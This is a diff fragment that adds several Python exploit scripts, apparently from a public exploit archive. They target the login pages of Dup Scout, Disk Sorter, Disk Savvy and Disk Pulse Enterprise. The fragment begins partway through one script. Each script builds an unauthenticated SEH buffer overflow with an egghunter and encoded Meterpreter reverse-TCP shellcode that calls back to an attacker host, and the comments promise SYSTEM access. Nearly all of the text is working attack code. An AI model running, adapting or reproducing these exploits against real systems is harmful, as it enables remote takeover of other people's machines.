 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 1001A1B8
 nseh = "\x90\x90\xEB\x0B"
 seh = "\xB8\xA1\x01\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "B" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()
--- a/platforms/windows/remote/40832.py
+++ b/platforms/windows/remote/40832.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 1004FAF3
 nseh = "\x90\x90\xEB\x0B"
 seh = "\xF3\xFA\x04\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "B" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()
--- a/platforms/windows/remote/40833.py
+++ b/platforms/windows/remote/40833.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 1004F9DD
 nseh = "\x90\x90\xEB\x0B"
 seh = "\xDD\xF9\x04\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "B" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()
--- a/platforms/windows/remote/40834.py
+++ b/platforms/windows/remote/40834.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 10081A9C
 nseh = "\x90\x90\xEB\x0B"
 seh = "\x9C\x1A\x08\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "\x42" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()
--- a/platforms/windows/remote/40835.py
+++ b/platforms/windows/remote/40835.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 10015BFE
 nseh = "\x90\x90\xEB\x0B"
 seh = "\xFE\x5B\x01\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "B" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()